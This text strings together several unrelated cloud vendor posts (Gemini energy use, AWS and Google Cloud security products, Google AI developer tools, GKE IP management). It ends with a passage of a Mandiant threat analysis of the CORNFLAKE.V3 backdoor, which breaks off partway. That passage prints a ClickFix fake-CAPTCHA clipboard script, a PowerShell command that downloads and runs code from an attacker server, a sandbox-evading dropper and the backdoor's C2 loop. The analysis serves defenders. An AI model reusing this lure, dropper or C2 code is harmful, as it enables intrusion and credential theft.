Efficient algorithms and quantization: We continuously refine the algorithms that power our models with methods like Accurate Quantized Training (AQT) to maximize efficiency and reduce energy consumption for serving, without compromising response quality.
Optimized inference and serving: We constantly improve AI model delivery for responsiveness and efficiency. Technologies like speculative decoding serve more responses with fewer chips by allowing a smaller model to make predictions that are then quickly verified by a larger model, which is more efficient than having the larger model make many sequential predictions on its own. Techniques like distillation create smaller, more efficient models (Gemini Flash and Flash-Lite) for serving that use our larger, more capable models as teachers. Faster machine learning hardware and models enable us to use more efficient larger batch sizes when handling requests, while still meeting our latency targets.
Custom-built hardware: We’ve been designing our TPUs from the ground up for over a decade to maximize performance per watt. We also co-design our AI models and TPUs, ensuring our software takes full advantage of our hardware — and that our hardware is able to efficiently run our future AI software when both are ready. Our latest-generation TPU, Ironwood, is 30x more energy-efficient than our first publicly-available TPU and far more power-efficient than general-purpose CPUs for inference.
Optimized idling: Our serving stack makes highly efficient use of CPUs and minimizes TPU idling by dynamically moving models based on demand in near-real-time, rather than using a “set it and forget” approach.
ML software stack: Our XLA ML compiler, Pallas kernels, and Pathways systems enable model computations expressed in higher-level systems like JAX to run efficiently on our TPU serving hardware.
Ultra-efficient data centers: Google’s data centers are among the industry’s most efficient, operating at a fleet-wide average PUE of 1.09.
Responsible data center operations: We continue to add clean energy generation in pursuit of our 24/7 carbon-free ambition, while advancing our aim to replenish 120% of the freshwater we consume on average across our offices and data centers. We also optimize our cooling systems, balancing the local trade-off between energy, water, and emissions, by conducting science-backed watershed health assessments, to guide cooling type selection and limit water use in high-stress locations.
Our commitment to efficient AI
Gemini’s efficiency gains are the result of years of work, but this is just the beginning. Recognizing that AI demand is growing, we’re heavily investing in reducing the power provisioning costs and water required per prompt. By sharing our findings and methodology, we aim to drive industry-wide progress toward more efficient AI. This is essential for responsible AI development.
1. A point-in-time analysis quantified the energy consumed per median Gemini App text-generation prompt, considering data from May 2025. Emissions per prompt was estimated based on energy per prompt, and applying Google’s 2024 average fleetwide grid carbon intensity. Water consumption per prompt was estimated based on energy per prompt, and applying Google’s 2024 average fleetwide water usage effectiveness. These findings do not represent the specific environmental impact for all Gemini App text-generation prompts nor are they indicative of future performance. 2. The results of the above analysis from May 2025 were compared to baseline data from the median Gemini App text-generation prompt in May 2024. Energy per median prompt is subject to change as new models are added, AI model architecture evolves, and AI chatbot user behavior develops. The data and claims have not been verified by an independent third-party.
AWS IoT Core now supports customer-managed keys (CMK) through AWS Key Management Service (KMS), enabling you to encrypt data stored in IoT Core with your own encryption keys. This enhancement gives you greater control over your encryption key lifecycle, including creation, rotation, monitoring, and deletion. Moreover, when you opt for CMK, the service handles the transition by automatically re-encrypting existing data while helping to maintain uninterrupted IoT operations. Operating within the AWS shared responsibility model, this security enhancement helps organizations meet their security requirements without impacting their IoT applications.
AWS Security Incident Response now offers seamless integration with popular IT Service Management (ITSM) tools like Jira and ServiceNow, enabling you to respond faster to security incidents while maintaining your existing processes and operating models. These integrations provide bidirectional synchronization, allowing you to create, update, and delete issues in either platform with automatic data replication into AWS Security Incident Response cases. Comments and attachments are also fully synchronized between platforms.
The integrations are available as open-source projects on GitHub, providing customers and partners the opportunity to contribute to and extend the functionality. The repository includes sample code, deployment instructions, and best practices for building custom integrations with AWS Security Incident Response. The solution features a modular architecture that makes it straightforward to add new integration targets beyond the initial Jira and ServiceNow offerings. The GitHub repository includes guidance on how to leverage tools like Amazon Q Developer, Kiro, or similar AI assistants for rapid customization and use with your favorite ITSM platform.
To get started with AWS Security Incident Response ITSM Integrations, visit our GitHub repository. Visit our technical documentation for Jira and ServiceNow for implementation details. Learn more about AWS Security Incident Response in the service’s User Guide.
AWS Security Incident Response is now Health Information Trust Alliance Common Security Framework (HITRUST CSF) certified, demonstrating its alignment with stringent security and privacy requirements established by HITRUST for managing sensitive data. This certification validates that AWS Security Incident Response meets comprehensive security controls required by healthcare, life sciences and many other regulated sectors.
HITRUST CSF is a comprehensive security and privacy framework developed by the HITRUST Alliance to help organizations in the healthcare industry and other regulated sectors effectively manage information risk and comply with a variety of security, privacy and regulatory requirements. It provides a scalable, transparent, and certifiable approach based on well-known industry standards and regulations, allowing organizations to demonstrate their commitment to protecting sensitive data and meeting compliance obligations. AWS customers can achieve HITRUST certification using AWS products and inherit AWS HITRUST scores, reducing the audit burden for both parties. Visit the AWS Services in Scope by Compliance Program to see a full list of services also covered by HITRUST.
AWS Security Incident Response automates security alert monitoring, streamlines incident response coordination, and provides direct access to 24/7 security experts, enabling organizations to efficiently detect, investigate, and mitigate security incidents. To learn more, see the AWS Security Incident Response documentation. Get started today by visiting AWS Security Incident Response via the console, AWS Command Line Interface, or APIs.
Do you remember packing for an extended trip twenty years ago? We had to load up a camera, a day planner, a pile of books, a handheld gaming device, a map-stuffed tourist guide, a phone, a CD player, and maybe some cashier’s checks. Now? Just remember your smartphone!
This is an example of consolidation, but sometimes diversification happens. For example, it wasn’t long ago that your “computer” was simply a desktop PC that was your one device for everything. Now, we have laptops for portable work, tablets for casual digital consumption, smartphones for on-the-go internet, smart TVs for watching every type of content, and a myriad of gaming consoles.
This dynamic reminds me of the current state of developer tooling. Until recently, it was fairly static — UX design tools for mock-ups, IDEs to write code, build systems to assemble artifacts, systems and shell scripting to get infrastructure and apps deployed. It’s become wildly more diverse and dynamic thanks to generative AI. What we do, and what we use, will never be the same.
So when do I use what? Google alone offers LLM interfaces like the Gemini app and Google AI Studio, IDE extensions like Gemini Code Assist, browser-based dev environments like Firebase Studio, along with agentic services like Jules and the Gemini CLI. It’s easy to feel overwhelmed. Let’s break it down.
This diversification of tools is due, in part, to the new ways AI can assist us in software engineering.
We now have delegated, agentic options. Think of outsourcing the work to a third party where you provide detailed instructions, and only have limited interactions until the work is complete. The goal here is to get the work done quickly, and you aren’t focused on growing your own knowledge.
The next category is supervised, where you have AI acting more like someone who works for you. It’s more interactive, but you’re scaling by providing experience-based intent to an AI agent.
The final category is collaborative. Here, we’re in a conversational interaction with an AI assistant, going back and forth as we “learn” together.
Key takeaways for each AI developer tool
Jules is best for explicit instructions that can drive unattended batch work—add documentation, improve test coverage, perform surgical code modernizations—against source code in GitHub.com
No infrastructure or machinery to manage and update
Iterate with Jules on a plan before sending it off to do work
Get back a set of changes and a pull request to accept them
The Gemini CLI offers an open, fast, and flexible interface for working with code and content interactively or through delegation
Lightweight CLI tool that only requires a local install of Node
Many extensibility points including built-in tools along with support for MCP
Built into other tools like Gemini Code Assist and Firebase Studio
The open source Gemini CLI GitHub Actions are ideal for delegating background work to code repos—issue triage, pull request review—through async or user-initiated triggers
Comes with generous free usage limits for premier Gemini models. It supports enterprise access through Vertex AI models and also works with your Gemini Code Assist license.
Gemini Code Assist provides a rich IDE extension for conversational or agentic interactions with a codebase
Plug-in for Visual Studio Code and Jetbrains IDEs
Offers code completion, test generation, code explanation, and code generation
Extensibility through custom commands, tools support, and code customization on private codebases. Agent mode is powered by the Gemini CLI and enables more complex interactions
Free tier along with per-user-per-month pricing for teams
Firebase Studio is the right choice when you want to build professional-grade software without the need to be a professional developer, while working in a Google-managed and browser-based dev environment
Built-in templates for popular frameworks and languages to start your project
Let Gemini vibe code your app or dive into the code thanks to the full power of an underlying customizable VM
Configure the workspace environment using nix
No cost during preview, and more environments available for those who sign up for the Google Developer Program
Google AI Studio delivers the best way to interact with Google’s latest models, experiment with prompts, and vibe code lightweight web apps
Generate media, use the Live API for interactive sessions, and write prompts against Gemini and Gemma models
Write prompts, use tools, ground with Google Search, and run comparisons
Get API keys to call Gemini models programmatically
Generous free tier along with a paid tier offering higher rate limits, more features, and different data handling
Cheatsheet:
Choose the Gemini app for quick app prototyping
Choose Google AI Studio for prompt experimentation with specific models and capabilities.
Choose Gemini Code Assist for AI-assisted software development in your environment, with your preferred toolchain.
Choose Firebase Studio when you want to come to a fully Google-managed environment to prototype or vibe code beautiful software without needing to be a full-time software developer.
Choose the Gemini CLI when you’re working with a wide array of generative AI projects and want the speed and portability of an agentic CLI. And choose the Gemini CLI GitHub Actions when you want to use Google Cloud security and models while triggering interactive or background tasks for GitHub-based projects.
Choose Jules when you’ve got GitHub-based projects that need changes that can be clearly articulated in a set of instructions.
I haven’t seen software development tools change this much—or such an eager willingness to try anything new—at any time in my career. It’s exciting and confusing. It’s important to see these tools as complementary, and you’ll likely use a mix to accomplish your tasks. At Google, we’re going to continue to focus on giving you the best AI tools to build the best AI apps. Let us know how to make both experiences better!
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e997b73d340>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
As organizations increase their focus on security and regulatory compliance, Google Cloud is helping our customers meet these obligations by fostering better collaboration between security and compliance teams, and the wider organization they serve.
To help simplify and enhance how organizations manage security, privacy, and compliance in the cloud, we’re thrilled to announce that Google Cloud Compliance Manager is now available in preview. Integrated into Security Command Center, this new capability provides a unified platform for configuring, monitoring, and auditing security and compliance across your infrastructure, workloads, and data.
Our AI-powered approach to supporting security and compliance obligations automates monitoring, detection, and reporting, and can help reduce manual effort while improving accuracy.
The bidirectional ability to translate regulatory controls into service level configurations or technical controls, and technical controls into policies, is essential for mitigating IT risks and streamlining operations. The ability to understand and visualize this interrelation between regulations and technical guardrails can help organizations establish a unified perspective on security and compliance risks and their remediation.
Security and Compliance are interrelated.
Reducing risk with smarter compliance
Many organizations have security and compliance obligations that need to align with government, industry, and enterprise-specific requirements. Compliance Manager allows you to configure these obligations using simple yet customizable constructs, prevent misconfigurations, monitor drifts and generate evidence of conformance within the same product experience. It supports standard security and compliance benchmarks, while allowing for customization at multiple levels.
Compliance Manager is designed to address these industry needs by unifying the entire security and compliance journey into three phases: configure, monitor, and audit.
Configure: You can express and enforce your security, privacy, and compliance intent based on your needs and risk tolerance using Compliance Manager, which provides a comprehensive library of frameworks and cloud controls, addressing global security and compliance regulations across industries and sectors. You can deploy these in preventive, detective, and evidence generation modes at different granularities, including organization, folder, and projects. You can also customize standard frameworks, and create your own to meet specific organization policies and unique needs.
Monitor: To continuously monitor and generate reports against your intended posture, Compliance Manager provides near real-time visibility into your compliance status, enabling proactive identification and remediation of potential issues. You can view findings and risks, with customizable and downloadable reports.
Audit: Audit Manager helps you generate evidence of conformance to security, privacy, and compliance that can be used for internal and external audits. It can automate and simplify the audit process, help you assess workloads for compliance, gather required evidence, and provide comprehensive audit reports. The effectiveness of this audit evidence generation has been validated through our partnership with FedRAMP for the FedRAMP 20X initiative.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e997bbd0df0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Core constructs: Frameworks and CloudControls
Compliance Manager introduces Frameworks and CloudControls as two new platform components to express security, privacy, and compliance intent.
Frameworks are collections of technical controls that can also be mapped to regulatory controls. A framework can represent the following:
Industry-defined security and compliance standards such as CIS, CSA-CCM, SOC2, ISO 27001, NIST-800-53, FedRAMP-High, PCI-DSS, GDPR.
Google Cloud-defined security, privacy, and compliance best practices, including for AI security, data security, and cloud security.
Customer-defined collection of technical policies and controls representing company or industry best practices.
CloudControls are platform-agnostic building blocks that encapsulate the business logic for configuration (preventative mode), checks (detective mode), and evidence collection (audit mode). These controls support settings and checks for multiple resources and attributes, and can be parameterized for deployment time customizations. Customers can also write their own custom cloud controls.
Compliance Manager comes with a library of Frameworks and Cloud Controls, and we plan to add more as customer needs evolve. You can customize these framework templates or compose your own by selecting from the library Cloud Controls. You can also create custom Cloud Controls either manually or with help from Compliance Manager’s GenAI based control authoring feature, providing quick time to value.
How to get started
Compliance Manager can be accessed directly from the Compliance navigation link, located under Security in Google Cloud Console. Go to the Compliance Overview page to start using it.
Compliance Manager overview on Google Cloud Console.
We have more updates planned for Compliance Manager as we build out its robust capabilities. We value your input, and would love to incorporate your feedback into our product roadmap. You can contact us through your Google Cloud account team, or send us your feedback at compliance-manager-preview@google.com.
In the age of data democratization and generative AI, the way organizations handle data has changed dramatically. This evolution creates opportunities — and security risks. The challenge for security teams isn’t just about protecting data; it’s about scaling security and compliance to meet this new reality.
While traditional security controls are vital to risk mitigation, many data security posture management solutions lack the necessary capabilities that today’s organizations require. For example, an organization with AI workloads needs to make sure that sensitive data is not leaking into the training environment; that intellectual property such as models and weights are protected from exfiltration; and that all their models support “compliance explainability.”
There are four key concerns that organizations should understand for robust data security: where sensitive data resides, how it’s used, what controls can secure it, and the monitoring tools available to provide evidence for compliance. Our new Data Security Posture Management (DSPM) offering, now in preview, provides end-to-end governance for data security, privacy, and compliance.
DSPM capabilities include differentiating advanced data controls that match security, privacy, and compliance requirements and align with business needs. Available as part of Security Command Center, this Google Cloud-native solution can help reduce tooling complexity, and provides native platform experience.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e997b6f5280>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
DSPM starts with a data map that offers a birds-eye view of data across your Google Cloud environment, its sensitivity level, and its default security posture. Discovery can help apply policies to monitor and secure their data, allowing curated controls to be matched with their sensitive data needs.
With Google Cloud DSPM, security and compliance teams can:
Discover data: DSPM provides comprehensive visibility into your data estate. It automatically discovers data assets across your Google Cloud environment and uses sensitivity labels from Sensitive Data Protection to help you understand what data you have and where it resides.
Assess risk: DSPM evaluates your current data security posture against Google Cloud’s recommended best practices, and can help identify potential vulnerabilities and misconfigurations.
Protect data: DSPM deploys data security frameworks by mapping security and compliance requirements to control policies, and can help you monitor them in near-real time.
Simplify compliance: DSPM can audit data against relevant compliance frameworks, help you pinpoint gaps, and generate detailed, evidence-backed compliance reports. DSPM can also help assess compliance with HIPAA, GDPR, and PCI DSS.
A visual overview of Google Cloud’s Data Security Posture Management solution.
How advanced DSPM controls help with security and compliance requirements
Security teams can get started by identifying sensitive data in their organization’s Google Cloud environment, and mapping desired security and compliance outcomes to specific data controls. To make this process easier, DSPM offers advanced controls, such as data access governance, flow governance, data protection, and data deletion controls to meet security and compliance outcomes.
Currently, these controls can be applied in detective mode on data boundaries, including organization, folder, and project. You can also use Google Cloud Sensitive Data Protection (SDP) to scan for specific types of sensitive data.
Applying advanced data controls to protect data.
Data access governance Using data access governance control, you can govern access to sensitive data, and restrict access in detective mode, to approved principals.
For example, an organization that needs governance around customer billing data can create a policy to allow only the fraud detection team to access sensitive customer billing information, and apply that control policy across sensitive data. Once applied, the policy will follow the data and surface any non-compliant access events.
Flow governance Using data flow control, you can restrict how data is moved across country boundaries in detective mode, to ensure that sensitive customer data is not moved outside a country boundary. As an example, let’s consider an organization with operations in a specific country that has a compliance requirement to not move customer data outside the country’s geographic boundary. With data flow governance, the organization can create a policy to only allow flow of data within that country, and apply that policy to sensitive data. Once applied, the control will surface any non-compliant read operations from outside the allowed geographic boundary.
Data protection Data protection controls can help manage the encryption key configuration, such as enforcing customer managed encryption keys (CMEK). You can create a policy to enforce CMEK as a policy on the keys protecting sensitive data.
Data deletion Using data deletion controls, you can manage the maximum duration that the data will be retained. You can create a policy with an allowed maximum retention period, and apply it to sensitive data.
Help shape the future of data security
We’re inviting security and compliance teams to be among the first to experience the power of Google Cloud DSPM. As part of the DSPM preview, organizations can:
Activate DSPM and begin evaluating its capabilities for specific business needs. For a detailed guide, please refer to the user guide.
Join the Technical Advisory Council and Customer Design Panels to provide valuable feedback that can influence DSPM development.
Work with Google Cloud experts to optimize their data security strategy and ensure a successful implementation.
For further questions, contact your Google Cloud account team, or or send us your feedback at dspm-pm@google.com.
Managing IP addresses in Kubernetes can be a complex and daunting task — but a crucial one. In Google Kubernetes Engine (GKE), it’s important that you manage IP addresses effectively, given the resource-constrained IPv4 address space. Sub-optimal configurations can lead to:
IP inefficiency: Poor utilization of the limited IPv4 address space
Complexity: Significant administrative overhead to plan and allocate IP addresses
Errors: Increased risk of hitting IP_SPACE_EXHAUSTED errors, which halt cluster scaling and application deployments
To help, we are pleased to announce the public preview of a new feature designed to simplify IP address management (IPAM) and improve IP efficiency in your GKE clusters: GKE auto IPAM.
Simplified and efficient IP management
GKE auto IPAM simplifies IPAM by dynamically allocating and/or de-allocating IP address ranges for nodes and pods as your cluster grows. This eliminates the need for large, potentially wasteful, upfront IP reservations and manual intervention during cluster scaling.
Benefits of GKE auto IPAM
Optimize resource allocation and enhance IP efficiency: Start with smaller IP ranges and let auto IPAM seamlessly expand them as needed, helping to ensure efficient utilization of your valuable IPv4 address space.
Scale with confidence and prevent IP exhaustion: Minimize your chances of running out of IPs. Auto IPAM proactively manages and dynamically allocates / deallocates addresses as your cluster grows, making it easy to scale.
Reduce administrative overhead: Simplify IPAM management with automated allocation and configuration, freeing up valuable time for your team — no manual intervention required.
Enable demanding workloads: Support resource-intensive applications that require rapid scaling by ensuring sufficient IP capacity is dynamically available on demand for growth and performance.
Getting started
This feature is compatible with both new and existing clusters running GKE version 1.33 or greater. Today, you can configure it with either gcloud CLI or API. Terraform and UI support is coming soon.
Updated cluster creation UI/UX
We’ve also overhauled the GKE cluster creation UI to make it simpler and more intuitive. The old interface buried critical IPAM settings deep in the cluster creation flow, making it difficult to discover, configure, and validate crucial network settings.Elevating IPAM and bringing it to the forefront provides a more intuitive and streamlined experience, so that you can easily and confidently define your network topology from the outset, for more robust and error-free cluster deployments.
IP address management made easy
GKE auto IPAM allows you to scale your clusters up and scale your clusters down on-demand, optimizing IP address resource allocation and reducing the administrative overhead of cluster operations. Try it today!
Amazon Managed Service for Apache Flink now supports Amazon Key Management Service (KMS) Customer Managed Keys (CMK). Amazon Managed Service for Apache Flink has always provided encryption by default using AWS-owned KMS keys. Now, customers have the option to use their own Customer Managed Keys providing greater control on how they can encrypt data stored in MSF.
Amazon Managed Service for Apache Flink simplifies the development and operation of real-time data stream processing applications by eliminating the complexity of managing Flink infrastructure. Apache Flink is an open source framework and engine for processing data streams.
For Amazon Managed Service for Apache Flink region availability, refer to the AWS Region Table.
For detailed information about implementing Customer Managed Keys in Amazon Managed Service for Apache Flink, visit our documentation.
Straight from Mandiant Threat Defense, the “Frontline Bulletin” series brings you the latest on the most intriguing compromises we are seeing in the wild right now, equipping our community to understand and respond to the most compelling threats we observe. This edition dissects an infection involving two threat groups, UNC5518 and UNC5774, leading to the deployment of CORNFLAKE.V3.
Introduction
Since June 2024, Mandiant Threat Defense has been tracking UNC5518, a financially motivated threat cluster compromising legitimate websites to serve fake CAPTCHA verification pages. This deceptive technique, known as ClickFix, lures website visitors into executing a downloader script which initiates a malware infection chain. UNC5518 appears to partner with clients or affiliates who use access obtained by the group to deploy additional malware.
While the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups. UNC5518 utilizes downloader scripts that function as an access-as-a-service. Several distinct threat actors have been observed leveraging the access provided by UNC5518, including:
UNC5774: A financially motivated group known to use CORNFLAKE backdoor to deploy a variety of subsequent payloads.
UNC4108: A threat cluster with unknown motivation, observed using PowerShell to deploy various tools like VOLTMARKER and NetSupport RAT, and conducting reconnaissance.
This blog post details a campaign where Mandiant identified UNC5518 deploying a downloader that delivers CORNFLAKE.V3 malware. Mandiant attributes the CORNFLAKE.V3 samples to UNC5774, a distinct financially motivated actor that uses UNC5518’s access-as-a-service operation as an entry vector into target environments.
The CORNFLAKE Family
CORNFLAKE.V3 is a backdoor, observed as two variants, written in JavaScript or PHP (PHP Variant) that retrieves payloads via HTTP. Supported payload types include shell commands, executables and dynamic link libraries (DLLs). Downloaded payloads are written to disk and executed. CORNFLAKE.V3 collects basic system information and sends it to a remote server via HTTP. CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers.
CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase. Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.
The original CORNFLAKE malware differed significantly from later iterations, as it was written in C. This first variant functioned as a downloader, gathering basic system information and transmitting it via TCP to a remote server. Subsequently, it would download and execute a payload.
Malware Family
CORNFLAKE
CORNFLAKE.V2
CORNFLAKE.V3
Language
C
JS
JS or PHP
Type
Downloader
Downloader
Backdoor
C2 Communication
TCP socket (XOR encoded)
HTTP (XOR encoded)
HTTP (XOR encoded)
Payload types
DLL
DLL,EXE,JS,BAT
DLL,EXE,JS,BAT,PS
Persistence
No
No
Registry Run key
Table 1: Comparison of CORNFLAKE malware variants
Figure 1: The observed CORNFLAKE.V3 (Node.js) attack lifecycle
Initial Lead
Mandiant Threat Defense responded to suspicious PowerShell activity on a host resulting in the deployment of the CORNFLAKE.V3 backdoor.
Mandiant observed that a PowerShell script was executed via the Run command using the Windows+Rshortcut. Evidence of this activity was found in the HKEY_USERSUserSOFTWAREMicrosoftWindowsCurrentVersionExplorerRunMRU registry key, containing the following entry which resulted in the download and execution of the next payload:
Name: a
Value: powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1
The RunMRUregistry key stores the history of commands entered into the Windows Run (shortcut Windows+R) dialog box.
The execution of malicious scripts using the Windows+R shortcut is often indicative of users who have fallen victim to ClickFix lure pages. Users typically land on such pages as a result of benign browsing leading to interaction with search results that employ SEO poisoning or malicious ads.
Figure 2: Fake CAPTCHA verification (ClickFix) on an attacker-controlled webpage
As seen in the Figure 2, the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard by the malicious web page when the user clicked on the image. The webpage accomplished this with the following JavaScript code:
// An image with the reCAPTCHA logo is displayed on the webpage
<div class="c" id="j">
<img src="https://www.gstatic[.]com/recaptcha/api2/logo_48.png"
alt="reCAPTCHA Logo">
<span>I'm not a robot</span>
</div>
// The malicious script is saved in variable _0xC
var _0xC = "powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1";
// When the image is clicked, the script is copied to the clipboard
document.getElementById("j").onclick = function(){
var ta = document.createElement("textarea");
ta.value = _0xC;
document.body.appendChild(ta);
ta.select();
document.execCommand("copy");
The PowerShell command copied to clipboard is designed to download and execute a script from the remote server 138.199.161[.]141:8080/$u, where $uindicates the UNIX epoch timestamp of the download.
As a result, the PowerShell process connects to the aforementioned IP address and port with URL path 1742214432(UNIX epoch timestamp), as shown in the following HTTP GET request:
GET /1742214432 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US)
WindowsPowerShell/5.1.19041.5486
Host: 138.199.161[.]141:8080
Connection: Keep-Alive
The following PowerShell dropper script, similar to 1742214432, was recovered from a threat-actor controlled server during the investigation of a similar CORNFLAKE.V3 compromise:
# Get computer manufacturer for evasion check.
$Manufacturer = Get-WmiObject Win32_ComputerSystem | Select-Object
-ExpandProperty Manufacturer
# Exit if running in QEMU (VM detection).
if ($Manufacturer -eq "QEMU") {
exit 0;
}
# Get memory info for evasion check.
$TotalMemoryGb =
(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB
$AvailableMemoryGb =
(Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB
$UsedMemoryGb = $TotalMemoryGb - $AvailableMemoryGb
# Exit if total memory is low or calculated "used" memory is low
(possible sandbox detection).
if ($TotalMemoryGb -lt 4 -or $UsedMemoryGb -lt 1.5) {
exit 0
}
# Exit if computer name matches default pattern
(possible sandbox detection).
if ($env:COMPUTERNAME -match "DESKTOP-S*") {
exit 0
}
# Pause execution briefly.
sleep 1
# Define download URL (defanged).
$ZipURL = "hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip"
# Define destination folder (AppData).
$DestinationFolder = [System.IO.Path]::Combine($env:APPDATA, "")
# Define temporary file path for download.
$ZipFile = [System.IO.Path]::Combine($env:TEMP, "downloaded.zip")
# Download the Node.js zip file.
iwr -Uri $ZipURL -OutFile $ZipFile
# Try block for file extraction using COM objects.
try {
$Shell = New-Object -ComObject Shell.Application
$ZIP = $Shell.NameSpace($ZipFile)
$Destination = $Shell.NameSpace($DestinationFolder)
# Copy/extract contents silently.
$Destination.CopyHere($ZIP.Items(), 20)
}
# Exit on any extraction error.
catch {
exit 0
}
# Update destination path to the extracted Node.js folder.
$DestinationFolder = [System.IO.Path]::Combine($DestinationFolder,
"node-v22.11.0-win-x64")
# Base64 encoded payload (large blob containing the CORNFLAKE.V3 sample).
$BASE64STRING =<Base-64 encoded CORNFLAKE.V3 sample>
# Decode the Base64 string.
$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)
# Convert decoded bytes to a string (the payload code).
$StringData = [System.Text.Encoding]::UTF8.GetString($BINARYDATA)
# Path to the extracted node.exe.
$Node = [System.IO.Path]::Combine($DestinationFolder, "node.exe")
# Start node.exe to execute the decoded string data as JavaScript, hidden.
start-process -FilePath "$Node" -ArgumentList "-e `"$StringData`""
-WindowStyle Hidden
The PowerShell dropper’s execution includes multiple steps:
Check if it is running inside a virtual machine and, if true, exit
Download Node.js via HTTPS from the URL hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip, write the file to %TEMP%downloaded.zip and extract its contents to the directory %APPDATA%node-v22.11.0-win-x64
Base64 decode its embedded CORNFLAKE.V3 payload and execute it via the command %APPDATA%node-v22.11.0-win-x64node.exe -e “<base64_decoded_CORNFLAKE.v3>”
The PowerShell dropper’s anti-vm checks include checking for low system resources (total memory less than 4GB or used memory less than 1.5GB) and if the target system’s computer name matches the regular expression DESKTOP-S* or the target system’s manufacturer is QEMU.
As a result of the dropper’s execution, a DNS query for the nodejs[.]org domain was made, followed by the download of an archive named downloaded.zip (MD5:e033f9800a5ba44b23b3026cf1c38c72). This archive contained the Node.js runtime environment, including its executable file node.exe, which was then extracted to %APPDATA%node-v22.11.0-win-x64. The Node.js environment allows for the execution of JavaScript code outside of a web browser.
The extracted %APPDATA%node-v22.11.0-win-x64node.exe binary was then launched by Powershell with the -e argument, followed by a large Node.js script, a CORNFLAKE.V3 backdoor sample.
Mandiant identified the following activities originating from the CORNFLAKE.V3 sample:
Host and AD-based reconnaissance
Persistence via Registry Run key
Credential harvesting attempts via Kerberoasting
The following process tree was observed during the investigation:
explorer.exe
↳ c:windowssystem32windowspowershellv1.0powershell.exe
-w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"
↳ c:users<user>appdataroamingnode-v22.11.0-win-x64node.exe
-e "{CORNFLAKE.V3}"
↳ c:windowssystem32windowspowershellv1.0powershell.exe
-c "{Initial check and System Information Collection}"
↳ C:WindowsSystem32ARP.EXE -a
↳ C:WindowsSystem32chcp.com 65001
↳ C:WindowsSystem32systeminfo.exe
↳ C:WindowsSystem32tasklist.exe /svc
↳ c:windowssystem32cmd.exe /d /s /c "wmic process where
processid=16004 get commandline"
↳ C:WindowsSystem32cmd.exe /d /s /c "{Kerberoasting}"
↳ c:windowssystem32cmd.exe /d /s /c
"{Active Directory Reconnaissance}"
↳ c:windowssystem32cmd.exe /d /s /c "reg add
{ChromeUpdater as Persistence}"
Analysis of CORNFLAKE.V3
The CORNFLAKE.V3 sample recovered in our investigation was completely unobfuscated, which allowed us to statically analyze it in order to understand its functionality. This section describes the primary functions of the malware.
When the script initially executes, a check verifies the command line arguments of the node.exeprocess, keeping in mind that the binary is initially spawned with a single argument (the script itself), this check forces the script to create a child process which has1 as an additional argument, then the initial node.exe exits. When the child process runs, since it now has three arguments, it will pass this initial check and execute the rest of the script.
This check allows the malware to ensure that only one instance of the script is executing at one time, even if it is launched multiple times due to its persistence mechanisms.
Following this, the malware attempts to collect system information using the following code:
This code block executes a series of PowerShell commands (or fallback CMD commands if PowerShell fails) using execSync. It gathers the script’s version, user privilege level (System, Admin, User), standard systeminfo output, running tasks/services (tasklist /svc), service details (Get-Service), available drives (Get-PSDrive), and the ARP table (arp -a).
C2 Initialization
After setting some logical constants and the command and control (C2) server IP address, the malware enters the mainloopfunction. The script contains support for two separate lists, hosts and hostsIP, which are both used in the C2 communication logic. Initially, the mainloop function attempts to connect to a random host in thehosts list, however, if unable to do so, it will attempt to connect to a random IP address in the hostsIP list instead. Once a connection is successfully established, the mainfunction is called.
// Define lists of hostnames and IP addresses for the command
and control server.
const hosts = ['159.69.3[.]151'];
const hostsIp = ['159.69.3[.]151'];
// Variables to manage the connection and retry logic.
let useIp = 0;
let delay = 1;
// Main loop to continuously communicate with the command
and control server.
async function mainloop() {
let toHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];
let toIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];
while (true) {
// Wait for the specified delay.
await new Promise((resolve) => setTimeout(resolve, delay));
try {
// Attempt to communicate with the command and control server.
if (useIp < 200) {
await main(toHost, PORT_IP);
useIp = 0;
} else {
await main(toIp, PORT_IP);
useIp++;
if (useIp >= 210) useIp = 0;
}
} catch (error) {
// Handle errors during communication.
console.error('Error with HTTP request:', error.message);
toHost = hosts[Math.floor(Math.random() * 1000) %
hosts.length];
toIp = hostsIp[Math.floor(Math.random() * 1000) %
hostsIp.length];
useIp++;
delay = 1000 * 10;
continue;
}
// Set the delay for the next attempt.
delay = 1000 * 60 * 5;
}
}
C2 Communication
This function, named main, handles the main command and control logic. It takes a host and port number as arguments, and constructs the data to be sent to the C2 server. The malware sends an initial POST request to the path /init1234, which contains information about the infected system and the output of the last executed command; the contents of this request are XOR-encrypted by the enc function.
This request is answered by the C2 with 2 possible responses:
ooff – the process exits
atst – the atst function is called, which establishes persistence on the host
